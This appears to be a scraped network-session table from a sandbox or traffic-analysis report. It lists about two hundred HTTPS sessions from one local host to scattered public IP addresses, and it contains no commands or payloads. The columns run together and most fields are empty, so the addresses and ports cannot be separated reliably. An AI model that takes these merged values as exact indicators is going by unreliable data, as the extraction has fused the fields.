                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17503192.168.2.135880659.217.129.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17504192.168.2.1342786200.165.24.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17505192.168.2.133524274.6.21.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17506192.168.2.133930268.251.155.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17507192.168.2.134678485.206.196.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17508192.168.2.1337678189.208.66.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17509192.168.2.134913446.59.128.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17510192.168.2.1360150170.167.234.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17511192.168.2.134095412.90.44.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17512192.168.2.1333456110.24.213.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17513192.168.2.1351698197.169.139.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17514192.168.2.135005031.45.233.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17515192.168.2.134079253.144.102.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17516192.168.2.1335888187.50.118.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17517192.168.2.133795623.153.104.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17518192.168.2.133711223.227.2.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17519192.168.2.1336926123.209.171.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17520192.168.2.134437052.238.98.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17521192.168.2.1359432207.140.142.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17522192.168.2.1335214199.159.15.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17523192.168.2.1358334192.59.235.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17524192.168.2.134816651.162.161.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17525192.168.2.1355846196.186.251.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17526192.168.2.135048653.176.252.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17527192.168.2.133644238.111.81.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17528192.168.2.135239852.110.183.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17529192.168.2.134322665.12.127.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17530192.168.2.133784478.189.212.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17531192.168.2.1334372185.107.151.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17532192.168.2.135635236.75.121.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17533192.168.2.1337980173.254.208.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17534192.168.2.136075032.181.221.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17535192.168.2.1351248122.132.213.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17536192.168.2.1334366200.145.180.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17537192.168.2.133994481.135.59.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17538192.168.2.1354198173.135.5.29443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17539192.168.2.1345928197.174.156.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17540192.168.2.1345832193.124.59.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17541192.168.2.1354408190.185.195.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17542192.168.2.1333478199.47.159.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17543192.168.2.1336436202.73.205.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17544192.168.2.1346512117.214.189.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17545192.168.2.133328251.86.58.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17546192.168.2.1333660112.245.177.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17547192.168.2.1345094179.143.235.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17548192.168.2.1340054211.184.132.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17549192.168.2.1336396205.251.130.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17550192.168.2.1350594139.100.91.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17551192.168.2.1337486220.23.67.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17552192.168.2.13584448.140.103.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17553192.168.2.1341434203.69.184.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17554192.168.2.1350580191.13.120.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17555192.168.2.1352028102.98.178.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17556192.168.2.135234241.64.55.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17557192.168.2.1360722192.26.147.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17558192.168.2.1353736133.74.149.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17559192.168.2.1333440210.217.13.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17560192.168.2.1348142202.20.78.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17561192.168.2.1350402219.34.49.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17562192.168.2.1354186180.102.2.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17563192.168.2.1339620138.223.12.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17564192.168.2.1352720145.132.190.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17565192.168.2.1340010212.60.19.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17566192.168.2.1345368211.53.186.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17567192.168.2.1335822183.78.190.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17568192.168.2.133305491.109.30.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17569192.168.2.1353840164.173.72.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17570192.168.2.135287676.91.132.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17571192.168.2.1356784108.28.31.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17572192.168.2.1338088141.138.86.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17573192.168.2.133701075.141.184.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17574192.168.2.134153873.175.232.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17575192.168.2.134526836.53.38.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17576192.168.2.134679468.24.131.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17577192.168.2.1352974130.148.159.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17578192.168.2.136066891.28.210.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17579192.168.2.1334010156.161.209.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17580192.168.2.1355940112.5.0.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17581192.168.2.135976296.103.149.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17582192.168.2.1353428205.12.206.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17583192.168.2.133289493.186.101.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17584192.168.2.1357056115.142.67.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17585192.168.2.13481945.161.226.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17586192.168.2.1352940193.109.133.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17587192.168.2.133893094.125.208.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17588192.168.2.1344900128.253.209.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17589192.168.2.134289037.28.69.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17590192.168.2.135634458.154.140.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17591192.168.2.1357836139.213.50.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17592192.168.2.134353882.196.15.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17593192.168.2.134374861.215.225.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17594192.168.2.1342858121.133.99.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17595192.168.2.1360782126.88.61.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17596192.168.2.134901061.96.154.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17597192.168.2.134551278.193.77.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17598192.168.2.1353102126.128.40.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17599192.168.2.133689037.104.65.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17600192.168.2.135124281.13.209.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17601192.168.2.1355638201.82.216.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17602192.168.2.133412645.47.43.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17603192.168.2.134019063.125.164.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17604192.168.2.1355980169.40.101.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17605192.168.2.134873875.164.89.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17606192.168.2.1343078135.86.35.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17607192.168.2.1333796118.37.22.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17608192.168.2.133943490.83.139.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17609192.168.2.133855648.55.178.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17610192.168.2.1342696199.216.86.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17611192.168.2.1345118183.155.70.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17612192.168.2.133353893.133.39.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17613192.168.2.1359492168.51.247.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17614192.168.2.134535641.231.55.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17615192.168.2.134668698.94.125.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17616192.168.2.134685667.90.225.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17617192.168.2.133464238.188.172.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17618192.168.2.1339694155.96.105.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17619192.168.2.13427621.63.82.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17620192.168.2.1360164105.51.130.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17621192.168.2.1353356176.155.209.105443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17622192.168.2.1354100218.187.130.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17623192.168.2.133775884.70.143.230443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17624192.168.2.134570681.126.58.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17625192.168.2.135659654.135.184.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17626192.168.2.1338558174.76.121.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17627192.168.2.1346798196.233.192.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17628192.168.2.135084259.191.110.91443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17629192.168.2.134983440.57.92.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17630192.168.2.135388070.193.205.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17631192.168.2.133745218.126.0.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17632192.168.2.134424488.208.6.15443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17633192.168.2.1340050141.102.189.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17634192.168.2.1356532193.87.48.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17635192.168.2.1355418106.222.119.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17636192.168.2.1351980111.97.114.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17637192.168.2.134637234.130.208.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17638192.168.2.1355842222.15.48.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17639192.168.2.1344388160.242.212.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17640192.168.2.135462020.204.13.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17641192.168.2.134072275.201.117.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17642192.168.2.1340148205.215.78.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17643192.168.2.135382053.250.50.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17644192.168.2.133789883.220.79.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17645192.168.2.134261018.204.3.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17646192.168.2.1352226137.250.52.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17647192.168.2.135051848.90.170.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17648192.168.2.1348406191.210.247.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17649192.168.2.134423412.193.60.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17650192.168.2.1339892153.58.25.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17651192.168.2.133671863.77.201.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17652192.168.2.1335452221.35.215.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17653192.168.2.135459248.243.158.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17654192.168.2.1335322223.109.36.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17655192.168.2.135451671.237.172.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17656192.168.2.1346480169.130.215.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17657192.168.2.134973635.214.22.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17658192.168.2.133819461.57.220.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17659192.168.2.1334174199.122.113.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17660192.168.2.135767689.70.87.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17661192.168.2.1355696212.196.0.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17662192.168.2.1350508120.100.47.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17663192.168.2.1353478219.203.83.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17664192.168.2.1337440137.140.2.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17665192.168.2.135066075.191.248.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17666192.168.2.1341814206.189.22.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17667192.168.2.1354774207.193.180.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17668192.168.2.1343408126.234.186.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17669192.168.2.13344641.134.38.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17670192.168.2.1341928175.174.101.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17671192.168.2.1356590104.161.41.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17672192.168.2.1348730140.200.178.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17673192.168.2.1341852122.34.5.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17674192.168.2.133419647.103.223.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17675192.168.2.1340286155.200.10.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17676192.168.2.1355746208.239.45.250443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17677192.168.2.135017495.116.62.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17678192.168.2.1360748216.162.88.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17679192.168.2.133727443.245.179.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17680192.168.2.1358158210.135.184.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17681192.168.2.1345452144.180.42.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17682192.168.2.1343308152.59.115.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17683192.168.2.1338914141.42.72.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17684192.168.2.1339472158.189.1.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17685192.168.2.1333286163.214.87.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17686192.168.2.134939469.141.123.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17687192.168.2.1336572118.215.165.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17688192.168.2.1340698163.146.143.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17689192.168.2.1349328213.217.197.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17690192.168.2.135859699.215.99.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17691192.168.2.1351552195.57.98.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17692192.168.2.1347204172.71.151.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17693192.168.2.134037264.236.164.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17694192.168.2.135578057.108.135.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17695192.168.2.1355898170.186.0.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17696192.168.2.133658086.150.30.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17697192.168.2.135411264.85.81.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17698192.168.2.1352260182.163.76.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17699192.168.2.136004080.124.162.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17700192.168.2.133436037.23.155.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17701192.168.2.135875025.253.79.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17702192.168.2.1359354152.130.223.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17703192.168.2.1352526144.198.23.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17704192.168.2.133359227.157.51.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17705192.168.2.135365448.244.147.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17706192.168.2.134017499.130.192.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17707192.168.2.135854683.93.71.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17708192.168.2.1349048136.234.121.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17709192.168.2.1354816191.189.249.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17710192.168.2.1350246111.180.234.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17711192.168.2.1339432128.191.154.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17712192.168.2.1348212141.108.181.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17713192.168.2.1342128194.20.33.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17714192.168.2.1338714176.247.18.78443
                                                  TimestampBytes transferredDirectionData


